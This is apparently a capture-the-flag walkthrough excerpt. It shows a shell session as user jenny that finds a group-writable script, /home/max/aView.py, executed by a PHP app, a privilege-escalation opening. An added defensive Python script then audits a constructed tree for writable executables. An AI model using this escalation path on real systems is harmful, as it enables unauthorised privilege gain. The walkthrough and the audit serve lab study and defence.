Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-66-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Mar  3 13:17:51 UTC 2023

  System load:  0.1                Processes:              197
  Usage of /:   69.9% of 11.75GB   Users logged in:        0
  Memory usage: 52%                IP address for enp0s17: 192.168.56.206
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

181 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

jenny@view:~$ id
uid=1007(jenny) gid=1007(jenny) groups=1007(jenny)
jenny@view:~$ sudo -l
[sudo] password for jenny: 
Sorry, user jenny may not run sudo on view.
jenny@view:~$ 

jenny@view:~$ cat /home/max/aView.py 
#!/usr/bin/python
# 
# executed from php app add final wrapper/scirpt here
print "waiting on engineers to tweak final code"
jenny@view:~$ ls -alh /home/max/aView.py 
-rwxrwx--- 1 max jenny 124 Oct 26  2019 /home/max/aView.py

The jenny user can modify the aView.py file.
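The file mode above is exactly the condition a permissions audit should catch: a script executed by another component that a different user's group can rewrite. The following is an added example, not the author's or the target's code, that walks a constructed directory tree mirroring /home/max/aView.py and /home/jenny and reports executables a non-owner could modify or replace; the tree and its modes are assumptions built from the listings above.

```python
"""Audit a home-directory tree for executables a non-owner could rewrite.

Added example, not from the original walkthrough. The finding above is
/home/max/aView.py, mode -rwxrwx--- owned by max with group jenny and run by
the PHP app: any member of group jenny controls what that app executes. This
walk reports every executable that is group- or world-writable, or that
lives in a group- or world-writable (non-sticky) directory, where it could
simply be replaced. The sample tree is constructed here to mirror the target's
layout; it is not a dump of the machine.
"""
import os
import stat
import tempfile

GROUP_OR_WORLD_WRITE = stat.S_IWGRP | stat.S_IWOTH
ANY_EXEC = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH


def _who(mode):
    """'group', 'other' or 'group/other' depending on which write bits are set."""
    who = []
    if mode & stat.S_IWGRP:
        who.append("group")
    if mode & stat.S_IWOTH:
        who.append("other")
    return "/".join(who)


def writable_executables(root):
    """Return sorted (relative path, octal mode, [reasons]) for risky executables."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        dir_mode = os.lstat(dirpath).st_mode
        # A writable directory lets anyone unlink and replace files in it,
        # unless the sticky bit (as on /tmp) restricts deletion to the owner.
        dir_loose = bool(dir_mode & GROUP_OR_WORLD_WRITE) and not (dir_mode & stat.S_ISVTX)
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode) or not (st.st_mode & ANY_EXEC):
                continue                      # only regular executables matter
            reasons = []
            if st.st_mode & GROUP_OR_WORLD_WRITE:
                reasons.append("file is %s-writable" % _who(st.st_mode))
            if dir_loose:
                reasons.append("parent dir is %s-writable (file can be replaced)"
                               % _who(dir_mode))
            if reasons:
                findings.append((os.path.relpath(path, root),
                                 oct(stat.S_IMODE(st.st_mode)), reasons))
    return sorted(findings)


def build_sample_tree():
    """Constructed fixture mirroring the modes seen in the walkthrough (assumed)."""
    root = tempfile.mkdtemp(prefix="view2akill_audit_")

    def put(rel, mode, body="#!/usr/bin/python\nprint 'stub'\n"):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, mode)

    put("max/aView.py", 0o770)            # -rwxrwx--- max:jenny, the finding
    put("max/safe.sh", 0o750)             # executable but owner-writable only
    put("jenny/passswords.txt", 0o775)    # -rwxrwxr-x as in the ls above
    put("jenny/.bashrc", 0o644)           # not executable: ignored
    os.chmod(os.path.join(root, "max"), 0o750)
    os.chmod(os.path.join(root, "jenny"), 0o777)   # drwxrwxrwx on the target
    return root


if __name__ == "__main__":
    for rel, mode, reasons in writable_executables(build_sample_tree()):
        print("%-22s %s  %s" % (rel, mode, "; ".join(reasons)))
```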

posted @ 2023-03-03 13:43  Jason_huawen